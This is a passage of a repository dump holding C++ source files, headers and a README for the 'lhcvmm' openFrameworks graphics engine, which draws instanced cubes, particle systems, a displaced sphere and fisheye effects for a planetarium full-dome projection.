oscPartsValue2;\n float oscPartsValue3;\n float oscInstValue1;\n float oscInstValue2;\n \n \n\n //-----------------------\n \n ofVec3f _center;\n \n //-----------------\n ofFbo fboInstanced;\n ofFbo fboParticles;\n ofFbo fboSphere;\n \n ofFbo fboPost;\n \n //-------------------\n PostProcessingManager postManager;\n\n ofxPanel guiMain;\n ofxToggle gDoPostProcessing;\n ofxToggle gReceiveOSC;\n ofxToggle gDoDrawInstanced;\n ofxToggle gDoDrawSphere;\n ofxToggle gDoDrawParts;\n ofxToggle gDoDrawDomeLimits;\n ofxVec3Slider gLightPos;\n ofxFloatSlider gFisheye;\n ofxIntSlider gFramePlayer;\n \n ofxToggle gUseCam;\n ofxToggle gAxis;\n ofxToggle gUseLight;\n\n SphereManager sphere;\n\n //----------------------\n \n ofxXmlSettings data;\n \n //renderer-----------------\n //commo render vars****************************************\n \n //animation data variables----------------\n bool isAnimating;\n int frameCounter;//animation Frame Counter\n //float frameDuration;//Duration in seconds of each frame\n int framesMaxNumber;//Number of frames of the entire animation\n float animValue;//Current frame in relationship with the duration of the entire animation (0.0 - 1.0)\n float animationTime;\n \n int lastFrameWithOnset;\n //----------------------------\n ofxFisheye fisheye;\n float fisheyeAmount;\n \n VideoRenderer renderer;\n \n //ofFbo drawFbo; //FBO for drawing scene, wihtout fisheye\n \n ofTrueTypeFont\tverdana;\n\n};\n" }, { "alpha_fraction": 0.6056782603263855, "alphanum_fraction": 0.6561514139175415, "avg_line_length": 32.78571319580078, "blob_id": "3fffb94058af2fe92ee2525d6c05208497f453a6", "content_id": "74da4ba9e8d34ff595ba6444a3b04459c61dcd56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 951, "license_type": "no_license", "max_line_length": 49, "num_lines": 28, "path": "/Graphics/apps/final/src/particleSystem/BosqueConstants.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "#pragma once\n\n//Keys macros\n#define KEY_DIST_TRESHOLD \"distTreshold\"\n#define KEY_PARTS_NUM \"partsNum\"\n#define KEY_PARTS_RATE \"partsRate\"\n#define KEY_X_VELOCITY \"xVelocity\"\n#define KEY_X_NZ_AMP \"xNzAmp\"\n#define KEY_X_NZ_FREQ \"xNzFreq\"\n#define KEY_RADIUS_INIT \"radiusInit\"\n#define KEY_RADIUS_VAR \"radiusVar\"\n#define KEY_RADIUS_NZ_AMP \"radiusNzAmp\"\n#define KEY_RADIUS_NZ_FREQ \"radiusNzFreq\"\n#define KEY_ANGLE_INIT \"angleInit\"\n#define KEY_ANGLE_VAR \"angleVar\"\n#define KEY_ANGLE_NZ_AMP \"angleNzAmp\"\n#define KEY_ANGLE_NZ_FREQ \"angleNzFreq\"\n#define KEY_PART_SIZE \"partSize\"\n\n//Colors\n\n//#define COLOR_IN_A ofColor(99,162,152)\n//#define COLOR_IN_B ofColor(99,162,152)\n//#define COLOR_IN_UNION ofColor(99,162,152)\n//\n//#define COLOR_OUT_A ofColor(162,97,107)\n//#define COLOR_OUT_B ofColor(162,97,107)\n//#define COLOR_OUT_UNION ofColor(162,97,107)\n\n\n\n\n\n" }, { "alpha_fraction": 0.6051872968673706, "alphanum_fraction": 0.6138328313827515, "avg_line_length": 19.799999237060547, "blob_id": "aab409e8524f9978bbde29d779c2d1bb8d922ad4", "content_id": "e3c01ba0f0663368b96550ec47f0111cd1ff6a11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1041, "license_type": "no_license", "max_line_length": 116, "num_lines": 50, "path": "/Graphics/addons/ofxFisheye/src/ofxFisheye.h", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "/*\nofxFisheye is an addon based 
on:\nhttp://www.geeks3d.com/20140213/glsl-shader-library-fish-eye-and-dome-and-barrel-distortion-post-processing-filters/\n */\n#pragma once\n\n#include \"ofMain.h\"\n\n#include \"fxFixFisheye.h\"\n#include \"fxBarrelDist.h\"\n#include \"fxVariableFisheye.h\"\n\n\nenum fxType{\n    tFixFisheye,\n    tBarrelDist,\n    tVariableFisheye\n};\n\nclass ofxFisheye{\n    \n    public:\n    \n    void setup(fxType type);\n    void draw();\n    void update();\n    void exit();\n    \n    void begin(ofTexture& fboTexture, int w, int h, float amount);\n    void end();\n    \n    void setFxType(fxType type);\n    fxType getFxType(){return currentFxType;}\n    string getFxTypeAsString();\n    \n    private:\n    \n    fxType currentFxType;\n    \n    ofShader fixFishShader;\n    ofShader barrelShader;\n    ofShader varFishShader;\n    \n    ofShader* currentShader;\n    \n    fxFixFisheye fixFisheye;\n    fxBarrelDist barrelDist;\n    fxVariableFisheye varFisheye;\n\n};\n\n" }, { "alpha_fraction": 0.7845467925071716, "alphanum_fraction": 0.7994056344032288, "avg_line_length": 38.588233947753906, "blob_id": "9b54f8c0af43573e6ca7ed8154ba0e07c214a890", "content_id": "eb9db5353aea035ce104411111e3b84ae9723ca4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 675, "license_type": "no_license", "max_line_length": 234, "num_lines": 17, "path": "/Graphics/apps/videoTest_2/README.md", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "# 2nd Video Test for BA Planetarium \n\n### Description\n45-second video sample for testing the BA Planetarium Full Dome projection system. It uses instanced rendering with Linear, Concentric and Rotating motion and Fisheye Fx filters. \n\n\n### Dependencies\n* ofxTimeline addon (https://github.com/YCAMInterlab/ofxTimeline)\ncommit: 0ad5b9ee92\n* addons: ofxVideoRecorder, ofxFisheye\n* common_classes: VideoRenderer, ImageSaverThread\n\n\n\n\n### Compilation\nThe Graphics Engine of the LHCVMM is developed using openFrameworks v0.9 (www.openFrameworks.com). 
To compile the examples in this repository you need to clone lhcvmm main directory into OF apps dir (OF_ROOT_DIR/apps/lhcvmm/Graphics/)\n" }, { "alpha_fraction": 0.5167464017868042, "alphanum_fraction": 0.5528156161308289, "avg_line_length": 25.115385055541992, "blob_id": "3ab77e54d8bea188baa409f834677b925c7f0f1c", "content_id": "58618df212834deaf761be39888e67b7636fd496", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2717, "license_type": "no_license", "max_line_length": 131, "num_lines": 104, "path": "/Graphics/apps/videoTest_3/src/SphereManager.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "\n#include \"SphereManager.h\"\n\nvoid SphereManager::setup(){\n \n displacement.setup();\n dispResolution = 96;\n \n faceShader.setGeometryInputType(GL_TRIANGLE_STRIP);\n faceShader.setGeometryOutputType(GL_TRIANGLE_STRIP);\n faceShader.setGeometryOutputCount(3);\n faceShader.load(\"entropica/shaders/faces/vert.glsl\", \"entropica/shaders/faces/frag.glsl\", \"entropica/shaders/faces/geom.glsl\");\n \n phongShader.load(\"entropica/shaders/phong/phong.vert\",\"entropica/shaders/phong/phong.frag\" );\n \n //--------------\n _mainColor = ofColor::white;\n material.setShininess(110.0);\n material.setDiffuseColor(_mainColor);\n \n setupGui();\n \n\n}\n//----------------------------------\nvoid SphereManager::update(){\n \n //---------------------------------\n float x, y, vol, rad, res, vel;\n \n float centroid = 0.5;\n float specComp = 0.5;\n \n x = centroid*.1;\n y = .001 + specComp*.049;\n vol = 0.5+centroid*0.1;\n rad = 30+specComp*100;\n res = dispResolution;\n vel = 1;\n \n dispNzAmnt =strengthGui;\n \n displacement.update(xGui, yGui, volumeGui, radiusGui, resolGui, ofGetFrameNum()*velGui);\n\n\n}\n//----------------------------------\nvoid SphereManager::drawScene(){\n \n material.begin();\n \n if (bDoFaceSh) {\n faceShader.begin();\n faceShader.setUniform1f(\"timeVal\", ofGetFrameNum());\n faceShader.setUniform1f(\"noiseAmnt\", dispNzAmnt);\n }else{\n phongShader.begin();\n }\n \n ofPushMatrix();\n ofTranslate(_pos.x, _pos.y, zPos);\n ofRotateX(180.0);\n \n \n bDoFaces ? sphereDistor.draw() : displacement.mainMesh.draw();\n \n \n ofPopMatrix();\n \n \n if (bDoFaceSh){\n faceShader.end();\n }else{\n phongShader.end();\n }\n \n material.end();\n\n \n}\n//----------------------------------\nvoid SphereManager::setupGui(){\n \n //cubeSphere------------\n gui.setup(\"sphere\");\n gui.setPosition(200,300);\n gui.add(velGui.setup( \"Velocity\", 1, 0, 5 ));\n gui.add(volumeGui.setup( \"Volume\", 0.185, 0, 1 ));\n gui.add(xGui.setup( \"X\", 0.0815, 0, 0.1 ));\n gui.add(yGui.setup( \"Y\", 0.06, 0, 0.1 ));\n gui.add(radiusGui.setup( \"Radius\", 97, 0, 500 ));\n gui.add(resolGui.setup( \"Resolution\", 96, 1, 100 ));\n gui.add(strengthGui.setup( \"Strength\", -25, -200, 200 ));\n gui.add(faceNoiseGui.setup( \"FaceNoise\", 20., 0., 20.));\n gui.add(zPos.setup( \"Z pos\", 0.0, -300.0, 300.0));\n}\n//----------------------------------\nvoid SphereManager::drawGui(){\n gui.draw();\n}\n//----------------------------------\nvoid SphereManager::setColor(ofColor col){\n _mainColor = col;\n material.setDiffuseColor(_mainColor);//??? 
es diffuse el que va?\n}\n" }, { "alpha_fraction": 0.5561398267745972, "alphanum_fraction": 0.59201979637146, "avg_line_length": 28.502283096313477, "blob_id": "1e7b7a762f8b04dfd9c0690d7d73dada922a89d2", "content_id": "122cbadbab2f7c3bf1453a5cde7100780f57efc1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6466, "license_type": "no_license", "max_line_length": 105, "num_lines": 219, "path": "/Graphics/apps/final/src/instanced/instancedManager.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "\n\n#include \"instancedManager.h\"\n\nvoid InstancedManager::setup(int fboWidth){\n \n _fboWidth = fboWidth;\n \n ofBoxPrimitive tmpBox;\n\ttmpBox.set(1.0);// set the size\n\tvboMesh = tmpBox.getMesh();\n \n \tshaderInst.load(\"shadersGL2/instanced.vert\", \"shadersGL2/instanced.frag\");\n \n _mode = LINEAL;\n _hRes = 40;\n _vRes = 20;\n _width = 100;\n _height = 30;\n \n Orient.set(1,1,1);\n yPos = 0.0;\n bDoQuilombo =false;\n velX=1.0;\n \n zPos = 0.0;\n \n velCounter = 1;\n \n maskRadius = 0.0;\n \n //material--\n material.setShininess( 100 ); // shininess is a value between 0 - 128, 128 being the most shiny //\n material.setSpecularColor(ofColor(255.f, 255.f, 255.f, 255.f));\n material.setDiffuseColor(mainColor);\n \n //-------------------\n setupGui();//mandatory\n}\n\n\n//--------------------------------------\nvoid InstancedManager::update(){\n \n int w = _fboWidth;\n \n //update instancedManager values\n if(!gMode)setMode(LINEAL);\n else if(gMode && !gRadMode) setMode(RAD_CONCENTRIC);\n else if(gMode && gRadMode){\n setMode(RAD_CENTRIFUGE);\n setRadDeform(gRadDeform);\n }\n \n setWidth(gWidth);\n setHeight(gHeight);\n setCubeSize(gCubesizeUnified * MAX_CUBESIZE*w);\n \n setMaskRadius(gMaskRadius);\n setHres(gHres * MAX_H_RES);\n setVres(gVres * MAX_V_RES);\n setVelocity(gVelocity * MAX_VELOCITY);\n setXpos(gXpos);\n setYpos(gYpos);\n setZpos(gZpos);\n //nz\n setNzTime(gNzTime * MAX_NZ_TIME);\n \n setXnzAmp(gNzXAmp * MAX_NZ_AMP*w);\n setXnzFreq(gNzXFreq * MAX_NZ_FREQ);\n setXnzRug(gNzXRug * MAX_NZ_RUG*w);\n \n setYnzAmp(gNzYAmp * MAX_NZ_AMP*w);\n setYnzFreq(gNzYFreq * MAX_NZ_FREQ);\n setYnzRug(gNzYRug * MAX_NZ_RUG*w);\n \n setZnzAmp(gNzZAmp * MAX_NZ_AMP*w);\n setZnzFreq(gNzZFreq * MAX_NZ_FREQ);\n setZnzRug(gNzZRug * MAX_NZ_RUG*w);\n\n}\n//--------------------------------------\nvoid InstancedManager::drawScene(){\n \n\n\n material.begin();\n \n ofPushStyle();\n\tofSetColor(mainColor);\n \n ofPushMatrix();\n \n //set XYZ-----------------------\n \n //lineal\n if(_mode==LINEAL && _vRes>1)\n ofTranslate(xPos*Lim.x, _height*(-.5) + (yPos*Lim.y), zPos);\n //radial\n else if(_mode!=LINEAL && _vRes>1)\n ofTranslate(xPos*Lim.x, Lim.y*(.5) + (yPos*Lim.y),zPos);\n \n \n if(Orient.x<0){\n ofRotateY(180);\n ofTranslate(Lim.x*Orient.x, 0);\n }\n //-----------------------------------\n //Set Shader uniforms\n //---------------------------------------\n\tshaderInst.begin();\n if (_mode == LINEAL)\n shaderInst.setUniform1i(\"uMode\", 0);\n else if(_mode == RAD_CONCENTRIC)\n shaderInst.setUniform1i(\"uMode\", 1);\n else if(_mode == RAD_CENTRIFUGE)\n shaderInst.setUniform1i(\"uMode\", 2);\n \n shaderInst.setUniform1f(\"uDeformRad\", radDeform);\n \n\tshaderInst.setUniform1i(\"uHres\", _hRes);\n shaderInst.setUniform1i(\"uWidth\", _width);\n shaderInst.setUniform1i(\"uVres\", _vRes);\n shaderInst.setUniform1i(\"uHeight\", _height);\n shaderInst.setUniform1f(\"uMaskRadius\", maskRadius);\n \n\tshaderInst.setUniform1f(\"timeValue\", 
(velCounter% 3000) / 3000.0f);\n //shaderInst.setUniform1f(\"timeValue_b\", ofGetElapsedTimeMillis()); //time dependant\n shaderInst.setUniform1f(\"timeValue_b\", velCounter*10.0); //frame dependant\n \n shaderInst.setUniform1f(\"uTimeNoise\", noiseTime);\n \n shaderInst.setUniform1f(\"uXnoiseFreq\", xNoiseFreq);\n shaderInst.setUniform1f(\"uXnoiseAmp\", xNoiseAmp*Orient.x);\n shaderInst.setUniform1f(\"uXnoiseRug\", xNoiseRug);\n \n shaderInst.setUniform1f(\"uYnoiseFreq\", yNoiseFreq);\n shaderInst.setUniform1f(\"uYnoiseAmp\", yNoiseAmp*Orient.x);\n shaderInst.setUniform1f(\"uYnoiseRug\", yNoiseRug);\n \n shaderInst.setUniform1f(\"uZnoiseFreq\", zNoiseFreq);\n shaderInst.setUniform1f(\"uZnoiseAmp\", zNoiseAmp*Orient.x);\n shaderInst.setUniform1f(\"uZnoiseRug\", zNoiseRug);\n \n vboMesh.drawInstanced(OF_MESH_FILL, _hRes * _vRes);\n \n\tshaderInst.end();//------------------------------------\n material.end();\n \n\t\n //----\n velCounter+=velX;\n \n ofPopMatrix();\n \n ofPopStyle();\n \n \n}\n\n\n//--------------------------------------\nvoid InstancedManager::setCubeSize(float val){\n\n cubeSize = val;\n\n ofBoxPrimitive tmpBox;\n tmpBox.set(cubeSize);// set the size\n vboMesh = tmpBox.getMesh();\n \n// ofSpherePrimitive tmpSph;\n// tmpSph.set(cubeSize, 10);\n// vboMesh = tmpSph.getMesh();\n\n \n}\n//--------------------------------------\nvoid InstancedManager::setCubeSize(ofVec3f size){\n ofBoxPrimitive tmpBox;\n tmpBox.set(size.x, size.y, size.z);\n vboMesh = tmpBox.getMesh();\n}\n//--------------------------------------\nvoid InstancedManager::setupGui(){\n\n guiInstanced.setup(\"instanced\");\n guiInstanced.setPosition(0,300);\n guiInstanced.add(gMode.setup(\"LINEAL/RADIAL\", true));\n guiInstanced.add(gRadMode.setup(\"Concentric/Centrifuge\", false));\n guiInstanced.add(gRadDeform.setup(\"Radial Mix\", 0.0, 0.0, 1.0));\n \n \n guiInstanced.add(gWidth.setup(\"width\", 1.0, 0., 1.0));\n guiInstanced.add(gHeight.setup(\"height/radius\", 0.36, 0., 3.0));\n guiInstanced.add(gCubesizeUnified.setup(\"cubesize\", 0.15, 0., 1.0));\n guiInstanced.add(gMaskRadius.setup(\"maskRadius\", 0.16, 0.0, 1.0));\n guiInstanced.add(gHres.setup(\"Hres\", 1.0, 0., 1.0));\n guiInstanced.add(gVres.setup(\"Vres\", 1.0, 0., 1.0));\n guiInstanced.add(gXpos.setup(\"Xpos\", 0.0, 0., 1.0));\n guiInstanced.add(gYpos.setup(\"Ypos\", 0.0, 0., 1.0));\n guiInstanced.add(gZpos.setup(\"Zpos\", 0.0, -3000.0, 0.0));\n guiInstanced.add(gVelocity.setup(\"velocity\", 0.1, 0., 1.0));\n //nz\n guiInstanced.add(gNzTime.setup(\"nzTime\", 0.1, 0.0, 1.0));\n \n guiInstanced.add(gNzXAmp.setup(\"nzXAmp\", 0.0, 0.0, 1.0));\n guiInstanced.add(gNzXFreq.setup(\"nzXFreq\", 0.395, 0.0, 1.0));\n guiInstanced.add(gNzXRug.setup(\"nzXRug\", 0.1, 0.01, 1.0));\n \n guiInstanced.add(gNzYAmp.setup(\"nzYAmp\", 0.0, 0.0, 1.0));\n guiInstanced.add(gNzYFreq.setup(\"nzYFreq\", 0.5, 0.0, 1.0));\n guiInstanced.add(gNzYRug.setup(\"nzYRug\", 2.0, 0.01, 30.0));\n \n guiInstanced.add(gNzZAmp.setup(\"nzZAmp\", 0.14, 0.0, 1.0));\n guiInstanced.add(gNzZFreq.setup(\"nzZFreq\", 0.2, 0.0, 1.0));\n guiInstanced.add(gNzZRug.setup(\"nzZRug\", 0.05, 0.01, 1.0));\n}\n//--------------------------------------\nvoid InstancedManager::drawGui(){\n guiInstanced.draw();\n}\n\n\n\n" }, { "alpha_fraction": 0.44998395442962646, "alphanum_fraction": 0.4773966073989868, "avg_line_length": 27.746543884277344, "blob_id": "2c1162cb583f5bc2bf1fbdc569fb43adc350d184", "content_id": "1eac2745f4e0d339ab0ff03bf5c98e07c4ed2ec9", "detected_licenses": [], "is_generated": false, "is_vendor": 
false, "language": "C++", "length_bytes": 6240, "license_type": "no_license", "max_line_length": 118, "num_lines": 217, "path": "/Graphics/examples/rendererExample/src/ofApp.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "ISO-8859-10", "text": "#include \"ofApp.h\"\n\n//--------------------------------------------------------------\nvoid ofApp::setup(){\n \n ofSetFrameRate(FRAME_RATE);\n ofSetLogLevel(OF_LOG_VERBOSE);\n \n ofBackground(50);\n \n renderer.setup(FRAME_RATE, PNG_SEQUENCE, r1024);\n \n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.05, true, true);\n \n lastTimeMarker = 0.0;\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::update(){\n \n //dibujar contexto openGL en el fbo del renderer\n renderer.getFbo()->begin();\n ofClear(255);\n drawTestScene(renderer.getFboWidth(), renderer.getFboHeight());\n renderer.getFbo()->end();\n \n //grabar fbo en archivo png o frame del .mov\n renderer.update();\n}\n\n//--------------------------------------------------------------\nvoid ofApp::draw(){\n \n //preview del fbo del renderer escalado----\n renderer.draw(250, 0, 512, 512);\n\n //recording indicator-------------------\n if(renderer.getIsRecording()){\n ofPushStyle();\n ofSetColor(255, 0, 0);\n ofDrawCircle(ofGetWidth() - 60, 60, 40);\n ofPopStyle();\n }\n \n //draw key commands-----------------\n ofPushStyle();\n string keys = \"KEY COMMANDS:\";\n keys += \"\\nSpacebar: START/STOP Recording\"\n \"\\np: Secuencia Png\"\n \"\\nm: Archivo MOV-H264\"\n \"\\n1: 256x256\"\n \"\\n2: 512x512\"\n \"\\n3: 1024x1024\"\n \"\\n4: 2048x2048\"\n \"\\n5: 4096x4096\"\n ;\n ofSetColor(ofColor::white);\n ofDrawBitmapString(keys, 10, 20);\n ofPopStyle();\n \n //draw info-----------------\n ofPushStyle();\n string info = \"INFO: \";\n info += \"\\nfps: \"+ofToString(ofGetFrameRate())\n + \"\\nFBO output res: \" + renderer.getResolutionAsString()\n + \"\\nREC mode: \" + renderer.getRecordingModeAsString();\n if(renderer.getIsRecording()){\n info += \"\\nRECORDING FRAME NUM: \" + ofToString(ofGetFrameNum() - renderer.getLastFrameMarker());\n }\n ofSetColor(ofColor::yellow);\n ofDrawBitmapString(info, 10, ofGetHeight()-100);\n ofPopStyle();\n\n}\n//--------------------------------------------------------------\nvoid ofApp::exit(){\n renderer.exit();\n}\n\n//--------------------------------------------------------------\nvoid ofApp::drawTestScene(int w, int h){\n \n ofPushMatrix();\n ofPushStyle();\n ofTranslate(w * .5, h * .5);\n ofSetColor(ofColor::blue);\n float radius = w * 0.25 + w * 0.15 * sin(ofGetFrameNum()*0.1);//animacion dependiente del nž de frame\n ofFill();\t\t// draw \"filled shapes\"\n ofDrawCircle(0,0,radius);\n ofSetRectMode(OF_RECTMODE_CENTER);\n ofRotate(int (ofGetFrameNum()*2)% 360);//animacion dependiente del nž de frame\n ofSetColor(ofColor::green, 150);\n ofRect(0,0, w*0.4, w*0.4);\n ofPopStyle();\n ofPopMatrix();\n \n if(renderer.getIsRecording()){\n ofSetColor(ofColor::red);\n verdana.drawString(ofToString(ofGetElapsedTimef()-lastTimeMarker),w*.4, h*.5);\n }\n \n}\n\n//--------------------------------------------------------------\nvoid ofApp::keyPressed(int key){\n \n switch (key) {\n //start-stop recording\n case ' ':\n if(!renderer.getIsRecording()){\n renderer.startRecording();\n lastTimeMarker = ofGetElapsedTimef();//para medir el tiempo transcurrido desde que se empieza a grabar\n }else{\n renderer.stopRecording();\n }\n break;\n \n //change resolution\n case '1':\n if(renderer.getOutputResolution()!= r256){\n 
renderer.setOutputResolution(r256);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.05, true, true);\n }\n break;\n case '2':\n if(renderer.getOutputResolution()!= r512){\n renderer.setOutputResolution(r512);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.05, true, true);\n }\n break;\n case '3':\n if(renderer.getOutputResolution()!= r1024){\n renderer.setOutputResolution(r1024);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.05, true, true);\n }\n break;\n case '4':\n if(renderer.getOutputResolution()!= r2048){\n renderer.setOutputResolution(r2048);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.05, true, true);\n }\n break;\n case '5':\n if(renderer.getOutputResolution()!= r4096){\n renderer.setOutputResolution(r4096);\n verdana.load(\"fonts/verdana.ttf\", renderer.getFboWidth()*0.05, true, true);\n }\n break;\n \n //change recording mode\n case 'p':\n if(renderer.getRecordingMode()!=PNG_SEQUENCE) renderer.setRecordingMode(PNG_SEQUENCE);\n break;\n case 'm':\n if(renderer.getRecordingMode()!=MOV_FILE) renderer.setRecordingMode(MOV_FILE);\n break;\n \n \n \n default:\n break;\n }\n \n \n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::keyReleased(int key){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseMoved(int x, int y ){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseDragged(int x, int y, int button){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mousePressed(int x, int y, int button){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseReleased(int x, int y, int button){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseEntered(int x, int y){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::mouseExited(int x, int y){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::windowResized(int w, int h){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::gotMessage(ofMessage msg){\n\n}\n\n//--------------------------------------------------------------\nvoid ofApp::dragEvent(ofDragInfo dragInfo){ \n\n}\n" }, { "alpha_fraction": 0.46594446897506714, "alphanum_fraction": 0.48512014746665955, "avg_line_length": 26.216949462890625, "blob_id": "f99a31e369b174baf689622eab6b90bbc8d6f599", "content_id": "f72ef1aa3edda1fdc3cb452d06a90d7fe5793897", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 8031, "license_type": "no_license", "max_line_length": 119, "num_lines": 295, "path": "/Graphics/apps/final/src/particleSystem/ParticleSystemPair.cpp", "repo_name": "Opensemble/lhcvmm", "src_encoding": "UTF-8", "text": "\n#include \"ParticleSystemPair.h\"\n//----------------------------------------------------------\n\nvoid ParticleSystemPair::setup(int x, int y, int w, int h, PairType type){\n \n _x = x;\n _y = y;\n _w = w;\n _h = h;\n \n _type = type;\n \n \n system_1.setup(_x, _y, _w, _h, 1);\n system_2.setup(_w, _y, _w, _h, -1);\n \n _distanceTreshold = 100.0;\n _groupPartsNum = 3;\n\n ofLogVerbose()<<\"ParticleSystemPair setup: Loading lineShader:\";\n lineShader.setGeometryInputType(GL_LINES);\n lineShader.setGeometryOutputType(GL_TRIANGLE_STRIP);\n lineShader.setGeometryOutputCount(24);\n lineShader.load(\"bosque/shaders/cubeLines.vert\", 
\"bosque/shaders/cubeLines.frag\", \"bosque/shaders/cubeLines.geom\");\n //-------------\n ofLogVerbose()<<\"ParticleSystemPair setup: Loading phongShader:\";\n phongShader.load(\"bosque/shaders/phong.vert\",\"bosque/shaders/phong.frag\" );\n //-------------\n \n \n continuumTimer = 0.0;\n lastTimer = 0.0;\n _continuum_rate_ms = 500.0;\n \n material.setShininess(100);\n \n \n}\n//----------------------------------------------------------\nvoid ParticleSystemPair::update(std::map<string, float>& data1, std::map<string, float>& data2){\n \n system_1.update(data1);\n system_2.update(data2);\n \n _groupPartsNum = data1.at(KEY_PARTS_NUM);\n \n //automatic add parts\n int rate = data1.at(KEY_PARTS_RATE);\n int frame = ofGetFrameNum();\n \n if (frame%rate == 0){\n \n system_1.addParticlesGroup(_groupPartsNum);\n system_2.addParticlesGroup(_groupPartsNum);\n \n }\n \n \n}\n//----------------------------------------------------------\nvoid ParticleSystemPair::drawScene(){\n\n material.begin();\n \n checkAndDrawGroupUnions();\n \n system_1.drawParticles();\n system_2.drawParticles();\n \n material.end();\n \n}\n\n//----------------------------------------------------------\nvoid ParticleSystemPair::checkAndDrawGroupUnions(){\n \n \n \n for(int i=0; i<system_1.partGroups.size(); i++){\n \n auto group1 = system_1.partGroups[i];\n \n for(int j=0; j<system_2.partGroups.size(); j++){\n \n auto group2 = system_2.partGroups[j];\n \n float distance = group1->getAnchorPos().distance(group2->getAnchorPos());\n \n if(distance < _distanceTreshold){\n \n if (_type == IN){\n drawSolidMesh(group1, group2);\n }else if(_type == OUT){\n drawLineStructure(group1, group2);\n }\n \n }\n }\n \n }\n\n}\n//----------------------------------------------------------\nvoid ParticleSystemPair::drawSolidMesh(ParticleGroup *group1, ParticleGroup *group2){\n \n vector<ofMeshFace> faces;\n \n ofMeshFace face;\n ofMesh mesh;\n \n //each group1 vert with all group2 vert\n for (int i=0; i<group1->positions.size(); i++){\n for(int j=0; j<group2->positions.size()-1; j++){\n \n \n ofVec3f normal;\n \n ofVec3f vec = group1->positions[i];\n face.setVertex(0, vec);\n normal = vec.cross(group1->getAnchorPos());\n normal.normalize();\n face.setNormal(0, normal);\n \n vec = group2->positions[j];\n face.setVertex(1, vec);\n normal = vec.cross(group2->getAnchorPos());\n normal.normalize();\n face.setNormal(1, normal);\n \n vec = group2->positions[j+1];\n face.setVertex(2, vec);\n normal = vec.cross(group2->getAnchorPos());\n normal.normalize();\n face.setNormal(2, normal);\n \n faces.push_back(face);\n\n }\n }\n //each group2 vert with all group1 vert\n for (int i=0; i<group2->positions.size(); i++){\n for(int j=0; j<group1->positions.size()-1; j++){\n \n ofVec3f normal;\n \n ofVec3f vec = group2->positions[i];\n face.setVertex(0, vec);\n normal = vec.cross(group2->getAnchorPos());\n normal.normalize();\n face.setNormal(0, normal);\n \n vec = group1->positions[j];\n face.setVertex(1, vec);\n normal = vec.cross(group1->getAnchorPos());\n normal.normalize();\n face.setNormal(1, normal);\n \n vec = group1->positions[j+1];\n face.setVertex(2, vec);\n normal = vec.cross(group1->getAnchorPos());\n normal.normalize();\n face.setNormal(2, normal);\n \n faces.push_back(face);\n }\n \n }\n //set mesh faces\n mesh.setFromTriangles(faces);\n //mesh.setMode(OF_PRIMITIVE_TRIANGLE_FAN);\n\n //--------------------------------------\n \n ofPushStyle();\n\n ofFill();\n \n \n \n \n phongShader.begin();\n \n mesh.draw();\n \n phongShader.end();\n\n 
ofPopStyle();\n\n}\n//----------------------------------------------------------\nvoid ParticleSystemPair::drawLineStructure(ParticleGroup *group1, ParticleGroup *group2){\n    \n    vector<ofMeshFace> faces;\n    \n    ofMeshFace face;\n    ofMesh mesh;\n    \n    //each group1 vert with all group2 vert\n    for (int i=0; i<group1->positions.size(); i++){\n        for(int j=0; j<group2->positions.size()-1; j++){\n            \n            face.setVertex(0, group1->positions[i]);\n            face.setVertex(1, group2->positions[j]);\n            face.setVertex(2, group2->positions[j+1]);\n            \n            faces.push_back(face);\n            \n        }\n    }\n    //each group2 vert with all group1 vert\n    for (int i=0; i<group2->positions.size(); i++){\n        for(int j=0; j<group1->positions.size()-1; j++){\n            \n            face.setVertex(0, group2->positions[i]);\n            face.setVertex(1, group1->positions[j]);\n            face.setVertex(2, group1->positions[j+1]);\n            \n            faces.push_back(face);\n        }\n        \n    }\n    //set mesh faces\n    mesh.setFromTriangles(faces);\n    \n    //--------------------------------------\n    \n    ofPushStyle();\n    \n    ofFill();\n    \n    lineShader.begin();\n    lineShader.setUniform1f(\"thickness\", 0.002*_w);\n    \n    //mesh.drawWireframe();\n    int numVertex = mesh.getNumVertices();\n    \n    GLfloat vertexes[numVertex * 3];//array of floats (numVertex *3) 3->x,y,z\n    int i=0;\n    for(float n=0; n<mesh.getNumVertices(); n++) {\n        ofVec3f vec\t\t\t= mesh.getVertices()[n];\n        vertexes[i*3]\t\t= vec.x;\n        vertexes[(i*3)+1] = vec.y;\n        vertexes[(i*3)+2] = vec.z;\n        i++;\n    }\n    glEnableClientState(GL_VERTEX_ARRAY);\n    glVertexPointer(3, GL_FLOAT, 0, vertexes);\n    glDrawArrays(GL_LINE_STRIP, 0, numVertex);\n    \n    lineShader.end();\n    \n    ofPopStyle();\n    \n}\n\n//----------------------------------------------------------\nvoid ParticleSystemPair::addPartGroup(int ch){\n    \n    if(ch==1){\n        system_1.addParticlesGroup(_groupPartsNum);\n    }else if (ch==2){\n        